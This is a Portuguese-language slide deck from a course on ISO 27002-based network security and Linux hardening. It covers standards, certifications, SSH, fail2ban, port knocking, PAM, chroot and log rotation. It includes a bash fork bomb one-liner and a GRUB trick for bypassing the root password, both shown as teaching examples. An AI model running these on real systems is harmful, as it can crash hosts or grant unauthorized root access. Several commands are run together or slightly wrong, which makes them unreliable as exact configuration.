View
215
Download
0
Category
Preview:
Citation preview
Gestão de Redes de Computadores com Software Livre
Análise e Testes de Vulnerabilidade em Redes Corporativas Baseados na Norma ISO 27002
http://www.fag.edu.br/pos-graduacao/62/gestao-de-redes-de-computadores-com-softwares-livres
Jéfer Benedett Dörr http://www.inf.ufpr.br/jbdorr/
● Graduação em Informática pela UNIOESTE - Universidade Estadual do Oeste do Paraná (2006);
● Pós Graduação (Lato Sensu) em Software Livre com ênfase em Redes pela UNIPAN - União PanAmericana de Ensino (2009);
● Mestrado (Stricto Sensu) no Programa de Mestrado em Computação da Universidade Federal do Paraná
LARSIS - Laboratório de Redes e Sistemas Distribuídos
Sócio da SBC de número 31530
Membro IADIS - Internacional Association for Development of the Information Society
https://profjefer.wordpress.com/
Análise e Testes de Vulnerabilidade em Redes Corporativas Baseados na Norma ISO 27002
Gestão de Redes de Computadores com Software Livre
A disciplina tem por objetivo o foco em Segurança Computacional, e propõe soluções de controles com a norma ISO 27002 na sua versão vinculada pela ABNT. O objetivo é exemplificar na prática como buscar a conformidade contida na norma utilizando software livre. Sendo um curso pontual, dentro do contexto computacional, tendo como proposta a utilização de ferramentas FOSS (Free and Open Source Software) combinadas com o poder dos recursos do Sistema Operacional Linux, o que possibilitará ao profissional de TI analisar redes corporativas com ferramentas consagradas do mundo do software livre.
ATENÇÃO:
Todo o conteúdo deste material é meramente didático!Não faça uso indevido.
Ética
Objetivos
● Fornecer ao aluno uma visão geral sobre segurança da informação● Entender a importância da segurança da informação no mundo de hoje● Conhecer as principais ameaças● Compreender a terminologia básica utilizada● Conhecer certificações da área
Cronograma - 08/11/2013
1.1 - Introdução a Segurança da Informação,1.2 - Conceitos de Segurança da Informação,1.3 - Conceitos Básicos de Vulnerabilidades e Intrusos,1.4 - Normas e Metodologias de Segurança da Informação,
1.5 - Conformidades com a ABNT NBR ISO/IEC 27002:2005,1.6 - Instalação Personalizada do Sistema Operacional Linux,1.7 - Conceitos de Procedimentos de Segurança Pós-Instalação,
Cronograma - 09/11/2013
2.1 - Segurança no Sistema de Arquivos, 2.2 -Segurança no Terminal, 2.3 -Gerenciamento de Privilégios, 2.4 -Utilizando o PAM, 2.5 -Criando o Sistema ChRoot,
2.6 -Registro de Eventos, 2.7 -Criação de Uma Estrutura de Logs Personalizada, 2.8 -Integração do Syslog-NG com MySQL, 2.9 -Limpeza de Logs,
Cronograma - 13/12/2013
3.1-OSSTMM – Open
Source Security Testing
Methodology Manual.
3.2-Anatomia de um
Ataque,
3.3-Engenharia Social,
3.4-Footprint,
3.5-Footprint emSMTP,
3.6-Fingerprint,
3.7-Levantamento de Dados
Através de Port Scanners,
3.8-Técnicas de Varreduras,
3.9-Técnicas Furtivas,
Cronograma - 14/12/2013
4.1-Captura de Informações com Sniffers,4.2-Conceitos Básicos de
Backdoors,
4.3-Enumeração de
Serviços e Informações,
4.4 - Bruteforce,
4.5 - Negação de Serviço,
4.6 - Exploits,
4.7 - Google Hacking,
4.8 - Ferramentas,
4.9 - Contramedidas.
08/11/2013
1.1 - Introdução a Segurança da Informação,1.2 - Conceitos de Segurança da Informação,1.3 - Conceitos Básicos de Vulnerabilidades e Intrusos,1.4 - Normas e Metodologias de Segurança da Informação, 1.5 - Conformidades com a ABNT NRB ISO/IEC 27002:2005,1.6 - Instalação Personalizada do Sistema Operacional Linux,1.7 - Conceitos de Procedimentos de Segurança Pós-Instalação,
ISO27002
1.1 - Introdução a Segurança da Informação,
O que é segurança?
●Condição ou estado de estar seguro ou protegido.● Capacidade de manter seguro.● Proteção contra a fuga ou escape.● Profissional ou serviço responsável pela guarda e proteção de algo.
o que queremos proteger?
era da informação
Informação
Segurança da Informação
6 barreiras da segurança
Desencorajar Dificultar Discriminar Detectar Deter Diagnosticar
ISO27002
ISO27002
ISO27002
ISO27002
ISO27002
ISO27002
ISO27002
ISO27002
1.2 - Conceitos de Segurança da Informação,
“se você conhece a si mesmo e ao seu inimigo, não precisará temer o resultado de mil batalhas”Sun Tzu
CriptografiaEsteganografiaVPNAnti VírusFirewallChave Pública/PrivadaIDSHoney Pots
1.3 - Conceitos Básicos de Vulnerabilidades e Intrusos,
vulnerabilidadeativonormasscamphishingengenharia socialtrojanbackdoor……..
●Ameaça (Threat)Uma ação ou evento que pode comprometer a segurança
● Vulnerabilidade (Vulnerability)Existência de uma fraqueza, que comprometimendo inesperado da segurança
●Ataque (Attack)Tentativa de violar qualquer tipo de segurança
●Exploração (Exploitation)É violar a segurança através de uma vulnerabilidade
1.4 - Normas e Metodologias de Segurança da Informação,
ISO 27001Essa norma aborda os padrões para sistemas de gestão de segurança da informação. Substitui a norma BS 7799-2
ISO 27002Baseada na norma ISO 27001, essa norma trata das boas práticas de segurança da informação, onde indica uma série de possíveis controles dentro de cada contexto da área de segurança. A partir de 2006, tornou-se substituta da normaISO 17799:2005.
Basileia IIÉ uma norma da área financeira, conhecida também como Acordo de Capital de Basileia II. Essa norma fixa-se em três pilares e 25 princípios básicos sobre contabilidade e supervisão bancária. http://www.bis.org/publ/bcbs128.pdf
PCI-DSSA norma Payment Card Industry Data Security Standard, é uma padronização internacional da área de segurança de informação definida pelo Payment Card Industry Security Standards Council. Essa norma foi criada para auxiliar as organizações que processam pagamentos por cartão de crédito na prevenção de fraudes, através de maior controle dos dados e sua exposição.https://pt.pcisecuritystandards.org/_onelink_/pcisecurity/en2pt/minisite/en/docs/pci_dss_v2-0.pdf
ITILÉ um conjunto de boas práticas para gestão, operação e manutenção de serviços de TI, aplicados na infraestrutura. A ITIL busca promover a gestão de TI com foco no cliente no serviço, apresentando um conjunto abrangente de processos e procedimentos gerenciais, organizados em disciplinas, com os quais uma organização pode fazer sua gestão tática e operacional em vista de alcançar o alinhamento estratégico com os negócios.
COBITDo inglês, Control Objectives for Information and related Technology, é um guia de boas práticas, como um framework, voltadas para a gestão de TI. Inclui, em sua estrutura de práticas, um framework, controle de objetivos, mapas de auditoria, ferramentas para a sua implementação e um guia com técnicas de gerenciamento.
SOXA lei Sarbanes-Oxley visa garantir a criação de mecanismos de auditoria e segurança confiáveis nas empresas, incluindo ainda regras para a criação de comitês encarregados de supervisionar suas atividades e operações, de modo a mitigar riscos aos negócios, evitar a ocorrência de fraudes ou assegurar que haja meios de identificá-las quando ocorrem, garantindo a transparência na gestão das empresas.
NIST 800 SeriesSérie de documentos, guias e pesquisas desenvolvidos pelo National Institute of Standards and Technology, voltadas para a área de segurança da informação. Essa série é composta de documentos considerados "Special Publications", os quaisabordam desde segurança na tecnologia Bluetooth, até segurança em servidores.
http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf
CERTIFICAÇÕES RECOMENDADAS PARA PROFISSIONAIS DE SIC
Segurança de Redes
CompTIA Security+ CompTIA
ECSA – EC-Council Security Analyst EC-Council
GAWN – GIAC Assessing Wireless Networks
SANS
GCIA – GIAC Certified Intrusion Analyst SANS
GPEN – GIAC Penetration Tester SANS
SSCP – Systems Security Certified Practioner
ISC²
Segurança de Redes/Gestão da
Segurança da Informação
CASP – CompTIA Advanced Security Practitioner
CompTIA
Segurança de Redes/Segurança no Desenvolvimento de
Software
CEH – Certified Ethical Hacker EC-Council
GWAPT – GIAC Web Application Penetration Tester
SANS
LPT – Licensed Penetration Tester EC-Council
Tratamento de Incidentes de Segurança
Computacional
GCIH – GIAC Certified Incident Handler
SANS
Forense Computacional
CHFI – Computer Hacking Forensic Investigator
EC-Council
GCFA – GIAC Certified Forensic Analyst SANS
GCFE – GIAC Certified Forensic Examiner SANS
GREM – GIAC Reverse Engineering Malware
SANS
Segurança no Desenvolvimento de
Software
CSSLP – Certified Secure Software Lifecycle Professional
ISC²
Auditoria e Conformidade
Auditor Lider ISO 27001 RAB ou IRCA
CISA – Certified Information Systems Auditor
ISACA
Gestão/Auditoria/Conformidade
COBIT – Control Objectives for Information and related Technology
ISACA
CRISC – Certified in Risk and Information Systems Control
ISACA
ITIL – Information Technology Infrastructure Library
OGC
Gestão da Segurança
da Informação
CISM – Certified Information Security Manager ISACA
CISSP – Certified Information Systems Security Professional ISC²
CISSP (ISSAP) – Information Systems Security Architecture Professional
ISC²
CISSP (ISSEP) – Information Systems Security Engineering Professional
ISC²
CISSP (ISSMP)- Information Systems Security Management Professional
ISC²
ISFS – Information Security Foundation baseada na ISO27002 EXIN
ISMAS – Information Security Management Advanced baseada na ISO 27002
EXIN
ISMES – Information Security Management Expert baseada na ISO 27002
EXIN
MCSO – Modulo Certified Security Officer Modulo
Gestão de Continuidade de
Negócios
ABCP – Associate Business Continuity Professional
DRI International
CBCI – Business Continuity Institute Certificate BCI
AMBCI – Associate Member of the Business Continuity Institute
BCI
SBCI – Specialist Member of the Business Continuity Institute
BCI
CBCP – Certified Business Continuity Professional
DRI International
CFCP – Certified Functional Continuity Professional
DRI International
MBCP (Master Business Continuity Professional)
DRI International
1.5 - Conformidades com a ABNT NRB ISO/IEC 27002:2005,
ISO27002
ISO27002
ISO27002
1.6 - Instalação Personalizada do Sistema Operacional Linux,
Instalou ta seguro?
Segurança vs ComodidadeHardeningPolíticas de SegurançaRegistro de EventosMonitoramentoAcesso físicoNormas
ISO27002
1.7 - Conceitos de Procedimentos de Segurança Pós-Instalação,
Hardening é um processo de mapeamento de ameaças, blindagem de
sistemas, mitigação de riscos executando atividades corretivas com foco na
infra-estrutura a fim de evitar possíveis tentativas ataque.
Várias técnicas podem ser utilizadas, desde o kernel, controle de acesso de
usuários, atualizações de segurança e muito mais.
HARDENING
•Remover programas desnecessários•Ajustar permissões especiais•Aplicar segurança no sistema de arquivos•Gerenciar acessos locais e remotos•Ajustar privilégios de usuários•Procurar por senhas fracas
Exemplo: ssh
Alterando a Porta padrão
# vim /etc/ssh/sshd_conf
Port 5849
# /etc/init.d/ssh restart
Bloquear acesso do Root no ssh
$ sudo vi /etc/ssh/sshd_config
"#PermitRootLogin no"
$ sudo /etc/init.d/sshd restart
Fail2ban# apt-get install fail2ban
# cd /etc/fail2ban# cp jail.conf jail.local
ignoreip = 127.0.0.1 10.8.1.0/24bantime = 1800maxretry = 3
# /etc/init.d/fail2ban restart
O arquivo de log do fail2ban
é: /var/log/fail2ban.log
Verifique:
# tail -f /var/log/auth.log | grep
Failed
Port Knock
# aptitude install knockd
/etc/knockd.conf
[options] logfile = /var/log/knockd.log
[openSSH] sequence = 7000,8000,9000 seq_timeout = 5 command = /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
[closeSSH] sequence = 9000,8000,7000 seq_timeout = 5 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
Editar /etc/default/knockd e deixar as duas linhas seguintes:
START_KNOCKD=1KNOCKD_OPTS="-i eth0"
Isto define a placa que vai aceitar conexão e manter sempre o knock rodando.
# /etc/init.d/knockd restart
Se não estiver fechada, então feche a porta SSH do firewall pra testar se o serviço funciona. ; )
# iptables -A INPUT -p tcp --dport 22 -j DROP
# iptables -LDROP tcp -- anywhere anywhere tcp dpt:ssh
Configuração do cliente
Instale o mesmo utilitário do servidor:
Knockd:
# aptitude install knockd
Agora não precisa de nenhuma configuração adicional, apenas bater nas portas e já era.
# knock 192.168.0.155 7000:tcp 8000:tcp 9000:tcp
Acompanhe o log no servidor e veja as portas sendo abertas.
# tail -f /var/log/knockd.log 192.168.0.155: openSSH: Stage 1192.168.0.155: openSSH: Stage 2192.168.0.155: openSSH: Stage 3192.168.0.155: openSSH: OPEN SESAMEopenSSH: running command: /sbin/iptables -A INPUT -s 192.168.0.144 -p tcp --dport 22 -j ACCEPT
Agora se autentique normalmente.
$ ssh usuario@192.168.0.155
Pra fechar a porta use a mesma síntese usada pra abrir a porta do SSH, só que seguindo as sequência de portas de fechamento. Lembrete: você deve executar o comando do cliente e não da conexão remota. Mais uma coisa, se estiver logado a conexão se fecha.
$ knock 192.168.0.155 9000:tcp 8000:tcp 7000:tcp
Exemplo: TTL ping
Valores padrão
■ Roteadores Ciclades = 30
■ Linux = 64
■ Windows = 128
■ Cisco = 255
■ Linux + Iptables = 255
Por exemplo, quando damos um "ping www.uol.com.br" ele responde o valor 57. O valor mais próximo desse valor de TTL é o 64, que vem de Linux. Se considerarmos que o pacote deu 7 hops até chegar ao destino (passou por 7 roteadores) então temos o cálculo:
64-7 = 57
Para sabermos o valor de TTL do sistema operacional, podemos dar um cat no arquivo:
# cat /proc/sys/net/ipv4/ip_default_ttl64
# vim /etc/sysctl.conf
E no final dele, acrescentar uma linha com o novo valor de TTL que você definir:
net.ipv4.ip_default_ttl = 64
Depois é só validar com o comando:
# sysctl -p /etc/sysctl.conf
09/11/2013
2.1 - Segurança no Sistema de Arquivos, 2.2 -Segurança no Terminal, 2.3 -Gerenciamento de Privilégios, 2.4 -Utilizando o PAM, 2.5 -Criando o Sistema ChRoot, 2.6 -Registro de Eventos, 2.7 -Criação de Uma Estrutura de Logs Personalizada, 2.8 -Integração do Syslog-NG com MySQL, 2.9 -Limpeza de Logs,
ISO27002
2.1 - Segurança no Sistema de Arquivos,
Particionamentobkpsetuidsetgidlogrotatecriptografiaquotaspermissões
Particionamento
Dado um disco rígido de 40 GB, cria-se três partições primárias. A primeira com 64 MB, a segunda com 15360 MB e a terceira com 4544 MB. Nos 20992 MB restantes, cria-se uma partição estendida, de forma com que ela ocupe todo o espaço. Nesta partição estendida, criam-se cinco partições lógicas. A primeira com 10240 MB, a segunda com 7168 MB, a terceira com 2048 MB, a quarta com 1024 MB e a quinta com 512 MB. Desta forma o disco será totalmente preenchido.
Na primeira partição primária (de 64 MB), será montado o diretório /boot.Desta forma os arquivos de carregamento do sistema ficam isolados e mais seguros. A segunda partição primária (15360 MB) fica reservada para o diretório /home, isolando-se assim os arquivos dos usuários e limitando sua utilização do disco. Na terceira partição primária (4544 MB) será montado o diretório raíz (/), com os arquivos de inicialização do sistema. Na primeira e na segunda partições lógicas (10240 MB e 7168 MB) serão armazenados, respectivamente, os diretórios /usr e /opt. Isto limita o espaço utilizado pelos programas que serão instalados no sistema. Na terceira e na quarta partições lógicas (2048 MB e 1024 MB) residirão os diretórios /var e /tmp. Por fim, a quinta partição lógica (512 MB) ficará reservada para área de troca.
Problema de colocarmos nosuid e noexec nas partições.
SUID
SUID (Set User ID): O SUID quando aplicado faz com que o programa execute com o ID do dono
e não com o ID do utilizador.
Aplica-se o SUID num ficheiro utilizando: $ chmod u+s ficheirinho
Para verificarmos as permissões: $ ls –la ficheirinho
-rwsrw-r-- 1 jfrjfr Out 30 15:56 arquivo
Caso o SUID esteja aplicado mas o arquivo não é executável, em vez de s (minúsculo) aparece S
(maiúsculo)
-rwSrw-r-- 1 jfr jfr Out 30 15:56arquivo
# vim noexec.sh# chmod 700 noexec.sh# ./noexec.sh
#!/bin/bash
case $1 instart)mount -o remount,rw,noexec /varmount -o remount,rw,noexec /tmpmountecho "Partições SEM permissão de execução";;stop)
mount -o remount,rw,exec /varmount -o remount,rw,exec /tmpmountecho "Partições COM permissão de execucao”;;*) echo "erro use $0 {start|stop}"exit 0;;esacexit 1
ISO27002
Evitar acesso direto do root
sudoers
# sudoers file.## This file MUST be edited with the 'visudo' command as root.## See the sudoers man page for the details on how to write a sudoers file.# # Host alias specification # User alias specification # Cmnd alias specification # Defaults specification # User privilege specificationroot ALL=(ALL) ALL
# Uncomment to allow people in group wheel to run all commands# %wheel ALL=(ALL) ALL # Same thing without a password# %wheel ALL=(ALL) NOPASSWD: ALL # Samples# %users ALL=/sbin/mount /cdrom,/sbin/umount /cdrom# %users localhost=/sbin/shutdown -h nowjfr ALL=NOPASSWD:/sbin/ifup ,/sbin/ifdown
limitar uso do shell# cat /etc/passwd
# vim /root/auditoria/invalidos.sh
#!/bin/bashfor USER in $(cat /etc/passwd| cut -f 1 -d ``:'' | grep -v root | grep -v toor |grep -v teste)dousermod -s /bin/false $USERdone
limitar terminais
# vim /etc/securetty
tty1# tty2# tty3# tty4# tty5# tty6
Fork Bomb
:(){ :|:& };:
Limitar processos /etc/profile acrescentar no fim desse arquivo o seguinte código:
if [[ "$USER" == "root" ]]; then ulimit -S -u 512else ulimit -S -u 256fi
$ source /etc/profile
2.2 - Segurança no Terminal,
Cenário
Imagine um administrador logado como root em um dos servidores executando
uma tarefa administrativa. Logo em seguida é solicitado sua presença em outro
setor, e seu terminal ficou logado como root. Um funcionário mal intencionado
pode aproveitar dessa situação e e danificar o sistema, ou roubar informações de
acesso somente do root. Para REDUZIR, isso mesmo reduzir essa possibilidade de
ataque será utilizada a variável TMOUT. Mas por que apenas reduzir? Deve-se
atentar para as politicas de acesso físico à área dos servidores. Bloqueio de
interfaces usb, desativar funções do kernel como ctrl+alt+del.
export TMOUT=180 no terminal
ou
Adicione em /etc/profile:
readonly TMOUT=600expor TMOUT
Atualizar o profile para que entre em vigor as novas alterações sem precisar efetuar login novamente:
# source /etc/profile
Desabilitando Ctrl + Alt + Del
Abra e edite o seguinte arquivo:
# vim /etc/init/control-alt-delete.conf
Comente a linha abaixo:
#exec shutdown -r now "Control-Alt-Delete pressed"
Bloquear os terminais manualmente (VLOCK)Caso você queira bloquear os terminais manualmente, existe um programa chamado Vlock. Ele bloqueia o(s) terminal(is) e só libera quando for informada a senha do usuário que bloqueou o terminal. Primeiro instale o programa:
# aptitude install vlock
Para bloquear o terminal em que está logado, use o comando:
# vlock -a
grubRecuperar senha: kernel /boot/vmlinuz-2.6.xx-x-xxx root=/dev/xxx ro root=/bin/bash
Colocar senha no grub: grub2-mkpasswd-pbkdf2
vi /etc/grub.d/00_header
grub-update
ou
# (echo "senha" ; echo "senha") | grub-mkpasswd-pbkdf2 >> 00_header
2.3 - Gerenciamento de Privilégios,
setuidsetgidchownchgrpchmodsudoer
http://www.guiafoca.org/cgs/guia/iniciante/ch-perm.html
http://www.infowester.com/usuarioslinux.php
adduseraddgrouppasswd
Octal1 - Permissão de execução (x)2 - Permissão de gravação (w).4 - Permissão de leitura (r).
chage / usermod1. Forçar o usuário a trocar a sua senha no primeiro login:# chage -d 0 usuário
2. Definir a data de expiração da senha:# chage -E 2010-04-30 usuário
3. Definir o número mínimo de dias entre trocas de senhas:# chage -m 180 usuário
4. Definir o número de dias em que uma senha é válida:# chage -M 180 usuário
Com o -W ele informa ao user que vai expirar
Checando as políticas de validade de senhas de um determinado usuário:
# chage -l usuário
# chage -M 50 -m 7 -W 7 linustorvalds
Este comando aplica a política de senha para o usuário “linustorvalds” onde:
-M 50 -> Define que a senha será válida por um máximo de 50 dias, quando a mesma deverá ser
trocada.
-m 7 -> Define o número mínimo de dias em que o usuário poderá trocar sua senha antes do
período especificado para expiração. Caso o usuário possa trocar a qualquer momento ou dia, o
valor deverá ser 0.
-W 7 -> Número de dias antes de expirar nos quais o usuário vai receber alertas informando que
sua senha irá expirar.
ISO27002
2.4 - Utilizando o PAM,
limitações aos usuários no sistema.: pam_limits,
para limites dentro de uma sessão; e pam_time para restrição de logins em certos períodos.
Em sistemas baseados em Red Hat EL / Fedora, este arquivo será o /etc/pam.d/system-auth, enquanto que em sistemas baseados em Debian, são 4 arquivos: common-account,common-auth, common-password e common-session, todos dentro do diretório /etc/pam.d.
session required /lib/security/pam_limits.so
account requisite /lib/security/pam_time.so
http://www.vivaolinux.com.br/artigo/Uma-introducao-ao-LinuxPAM
http://www.ibm.com/developerworks/br/library/l-pam/
http://www.devin.com.br/limitando-usuarios-com-o-pam/
# vim /etc/pam.d/login
Habilitado o pam_time:
sintaxe das linhas é: serviços;ttys;usuários;horas
● serviços significa o nome do serviço PAM para se restringido. Exemplos: samba, su, login.
Use * para restringir para tudo.
● ttys significa em quais terminais a restrição será feita. Exemplo: terminais locais seriam
tty*. Use * para restringir para tudo.
● usuários significa uma lista dos usuários para a restrição. Múltiplos usuários podem ser
feitos com: “fulano|cicrano|beltrano” que significa fulano OU cicrano OU beltrano. O *
também pode ser utilizado para restringir a todos.
● horas é a faixa de horas e datas para a restrição. Melhor entendendido nos exemplos.
Para aprender melhor, vamos aos exemplos:
sshd:*:teste:Mo2100-2200
Na linha acima, o usuário teste só poderá acessar o sshd das 21:00 até as 22:00 na
Segunda-Feira.
A linha: sshd:*:teste:!Mo2100-2200
O usuário teste poderá acessar o sshd toda hora, exceto Segunda-Feira das 21:00
até as 22:00. A exclamação inverteu totalmente o caso.
No campo da faixa de tempo, podemos usar as abreviações:
● Su: Domingo
● Mo: Segunda
● Tu: Terça
● We: Quarta
● Th: Quinta
● Fr: Sexta
● Sa: Sábado
● Wk: Finais de semana (Sábado e Domingo)
● Wd: Dias da semana (Segunda à Sexta)
● Al: Todos os dias
Mais exemplos:
sshd:*:hugo:Wd0800-1800
O usuário hugo só poderá acessar o sshd em horário comercial, ou seja, de Segunda à
Sexta das 08:00 da manhã até as 18:00.
*:*:silvia|lisa:!Al1200-1800
As usuárias silvia e lisa não vão poder acessar nada durante todos os dias, das 12:00 às
18:00.
samba:*:guest:We1200-1201
O usuário guest só vai poder acessar o serviço PAM samba na quarta-feira das 12:00 as
12:01
PAM limitando recursos/etc/security/limits.conf
usuario/grupo tipo de limite recurso valor do limite
● memlock – Tamanho de memória alocada que os programas podem usar (em KB). Também: ulimit -l.
● nofiles – Número máximo de arquivos abertos ao mesmo tempo. Também: ulimit -n.
● maxlogins – Número máximo de logins para esse usuário
● nice – Número máximo de prioridade que o usuário pode setar, entre -20 (máxima prioridade) e 19
(mínima prioridade). Também: ulimit -e.
● stack – Valor máximo de um processo executado (em KB). Também: ulimit -s.
● cpu – Tempo máximo em minutos de uso da CPU. Também: ulimit -t.
● nproc – Número máximo de processos executados ao mesmo tempo. Também: ulimit -u.
teste hard fsize 100
O usuário teste não pode criar arquivos maiores que 100KB (fsize 100). Testando:
$ dd if=/dev/zero of=arquivo bs=1024 count=100
100+0 records in
100+0 records out
102400 bytes (102 kB) copied, 0.0011873 s, 86.2 MB/s
Ele deixou criar um arquivo de 100KB. Agora vou criar um de 105!
$ dd if=/dev/zero of=arquivo bs=1024 count=105
File size limit exceeded
teste hard nproc 5
O usuário teste só poderá executar 5 processos. Tenha em mente que os processos do bash por
exemplo também contam. Então colocar 1 não é uma boa idéia assim se seu usuário tiver
executando uma shell interativa.
@teste hard maxlogins 1
Todo mundo do grupo teste só pode se logar uma vez no sistema.
dumau hard memlock 20000
O usuário dumau só pode usar 20MB de memória no sistema.
@users hard priority 19
Todos os usuários do grupo users vão executar seus processos automaticamente com prioridade
mais baixa do sistema.
2.5 -Criando o Sistema ChRoot,
# aptitude install debootstrap
# mkdir /var/fag-chroot
# debootstrap squeeze /var/fagl-chroot
# mount --bind /proc/ /var/fag-chroot/proc
# chroot /var/fagl-chroot
# pico /root/.bashrc
PS1=' fag-chroot:\w\$ '
# aptitude update
http://www.vivaolinux.com.br/artigo/Instalando-e-configurando-um-servidor-DNS-(Bind+CHROOT)-no-Slackware?pagina=1
https://wiki.debian.org/pt_BR/Debootstrap
# passwd root
# pico /etc/fstab
Adicione a seguinte linha no arquivo:
devpts /dev/pts devpts defaults 0 0
# mount -a
# mount
Para verificar se ponto foi montado. Deverá aparecer o seguinte conteúdo: devpts on /dev/pts type devpts (rw)
Se você possui um servidor SSH no seu sistema original, é preciso dar um stop nele, pois como os processos são vinculados, não pode ter dois servidores do mesmo serviço rodando. Antes de instalarmos o SSH eno chroot, saia do mesmo e pare o SSH no sistema original:
# /etc/init.d/ssh stop
Depois entre no chroot novamente.
Vamos instalar o pacote SSH em nosso chroot, para que ele possa ser acessado remotamente:
# aptitude install ssh
Depois que o SSH estiver instalado, dê o comando abaixo e verifique se o SSH está rodando:
# ps aux | grep ssh
ISO27002
ISO27002
ISO27002
2.6 -Registro de Eventos,
http://www.vivaolinux.com.br/artigo/SysLog-Sistema-de-log-do-Linux
radiografia completa do sistema
O syslog tem duas funções:■ Liberar os programadores de gerar seu arquivos de log (antes do syslog tinha
que ser feito por cada programador, isso era terrível);
■ Deixar o administrador do sistema no controle dos logs.
O syslog é constituído de 3 partes:■ O daemon syslogd;
■ Openlog, que são rotinas e bibliotecas chamadas para ter acesso ao syslog;
■ Logger, que é um comando shell para o usuário enviar entradas para o syslog.
2.7 -Criação de Uma Estrutura de Logs Personalizada,
2.8 -Integração do Syslog-NG com MySQL,
http://bjuniow.wordpress.com/2009/08/20/instalando-syslog-ng-com-mysql/
http://anton.dollmaier.name/2013/05/10/syslog-host-mit-syslog-ng-und-mysql/
http://www.douglas.wiki.br/doku.php?id=instalacao_e_configuracao_do_syslog-ng_com_mysql_no_debian_squeeze
http://www.vivaolinux.com.br/artigo/Servidor-de-log-no-Debian-com-Syslognghttp://vermeer.org/docs/1
2.9 -Limpeza de Logs,
logrotate
/etc/logrotate.conf
Alguns scripts especiais são incluídos na pasta /etc/logrotate.d
http://www.vivaolinux.com.br/artigo/Logrotate-uma-importante-ferramenta-de-administracao-dos-logs-do-sistema
http://linuxcommand.org/man_pages/logrotate8.html
rotação. Pode ser diária(daily), semanal(weekly), mensal(monthly).
Utilizar o logrotate é fundamental porque os logs crescem infinitamente. Configurar o logrotate.conf para atender da melhor forma possível as suas necessidades também é fundamental.
Auxílio do cron
*cronO crontab tem o seguinte formato:
[minutos] [horas] [dias do mês] [mês] [dias da semana] [usuário] [comando]
O preenchimento de cada campo é feito da seguinte maneira:■ Minutos: informe números de 0 a 59;
■ Horas: informe números de 0 a 23;
■ Dias do mês: informe números de 1 a 31;
■ Mês: informe números de 1 a 12;
■ Dias da semana: informe números de 0 a 7;
■ Usuário: é o usuário que vai executar o comando (não é necessário especificá-lo se
o arquivo do próprio usuário for usado);
■ Comando: a tarefa que deve ser executada
$ crontab -e
# tarefa 130 22 2,10 * * echo "Go n Go"
#[minutos] [horas] [dias do mês] [mês] [dias da semana] [usuário] [comando]
ls /etc/cron.daily/ -> script do log rotate
Executando manualmente: $logrotate /etc/logrotate.conf
/var/log/apache2/*.log { weekly missingok rotate 52 compress delaycompress notifempty create 640 root adm sharedscripts postrotate /etc/init.d/apache2 reload > /dev/null endscript }
Exemplo Apache:
Analisando algumas diretivas de configuração disponíveis no logrotate:
● Período em que os arquivos de log devem ser rotacionados: Daily, Weekly e
Mounthly
● rotate 35 - indica o número de arquivos de log rotacionados a serem
mantidos, o arquivo rotacionado mais velho sempre é substituído.
● compress - comprimir os arquivos de log rotacionados (padrão é o gzip).
● create - imediatamente após rotacionar um arquivo de log o arquivo de log é
recriado com o mesmo nome e com as permissões especificadas. Exemplo de
sintaxe: create 640 root adm
● delaycompress - comprimir o arquivo de log rotacionado apenas no
próximo rotacionamento. Útil quando um aplicativo continua escrevendo um
arquivo de log por um determinado tempo após o rotacionamento. Esta
diretiva deve ser utilizada de forma concomitante com a diretiva compress
● dateext - inserir a data em que os arquivos foram rotacionado como
parte do nome do arquivo de log rotacionado. Um exemplo de arquivo
rotacionado gerado com a data no nome: /var/log/syslog-20131210.gz
● size 5M - tamanho que o arquivo de log deve ter para ser rotacionado, o
"M" indica megabytes, também pode ser utilizado "k" que indica kilobytes.
● olddir - diretório para onde os arquivos de log rotacionados devem ser
movidos. Exemplo de sintaxe: olddir /var/log/logs_antigos
● postrotate/endscript - os comandos definidos entre estas duas diretivas
são executadas logo após o arquivo de log ser rotacionado.
● prerotate/endscript - os comandos definidos entre estas duas diretivas
são executadas antes o arquivo de log ser rotacionado.
/etc/logrotate.conf
# See "man logrotate" for details # período em que os arquivos de log devem ser rotacionados daily rotate 35 compress dateext size 5M copytruncate notifempty nomail noolddir
# administrador ou aplicativos podem inserir seus arquivos de configuração específicos de rotacionamento de log neste diretório include /etc/logrotate.d # administrador ou aplicativos podem inserir seus arquivos de configuração específicos de rotacionamento de log neste diretório include /etc/logrotate.d
# também podem ser inseridas configurações de rotacionamento de logs diretamente neste arquivo. # para isso basta definir o nome do arquivo de log a ser rotacionado e suas configurações específicas que sobrescrevem as gerais definidas anteriormente. /var/log/wtmp { monthly create 0664 root utmp rotate 1 }
# é preciso especificar os arquivos a serem rotacinados pelo logrotate /var/log/mail.info /var/log/mail.log /var/log/mail.err { rotate 31 } # outra forma de especificar os arquivos a serem rotacionados pelo logrotate /var/log/*log { rotate 31 }
NTP http://www.ntp.br/NTP/
a.st1.ntp.br b.st1.ntp.br c.st1.ntp.br d.st1.ntp.br
a.ntp.br b.ntp.br c.ntp.br gps.ntp.br
Manter os dispositivos nas redes e na Internet com a hora certa é muito importante. Isso vale para servidores, roteadores, notebooks e desktops! Muitas aplicações dependem disso para funcionar bem. Incidentes de segurança e até crimes cibernéticos só podem ser investigados se os logs dos dispositivos envolvidos estiverem em sincronismo.
Por um acordo entre o ON (Observatório Nacional), que é responsável pela Hora Legal Brasileira, e o NIC.br (Núcleo de Informação e Coordenação do Ponto BR), a hora certa no Brasil é distribuída gratuitamente via Internet por meio do NTP.br. Saiba mais navegando pelo sítio, e utilize livremente os servidores disponíveis:
https://pt.wikipedia.org/wiki/Network_Time_Protocol
# apt-get update; apt-get install ntp
# nano /etc/ntp.conf
# "memoria" para o escorregamento de frequencia do micro # pode ser necessario criar esse arquivo manualmente com # o comando touch ntp.drift driftfile /etc/ntp.drift
# estatisticas do ntp que permitem verificar o historico # de funcionamento e gerar graficos statsdir /var/log/ntpstats/ statistics loopstats peerstats clockstats filegen loopstats file loopstats type day enable filegen peerstats file peerstats type day enable filegen clockstats file clockstats type day enable
# servidores publicos do projeto ntp.br server a.st1.ntp.br iburst server b.st1.ntp.br iburst server c.st1.ntp.br iburst server d.st1.ntp.br iburst server gps.ntp.br iburst server a.ntp.br iburst server b.ntp.br iburst server c.ntp.br iburst # outros servidores # server outro-servidor.dominio.br iburst # configuracoes de restricao de acesso restrict default kod notrap nomodify nopeer restrict -6 default kod notrap nomodify nopeer
Explicando:■ driftfile :: especifica o arquivo que armazenará a frequência de
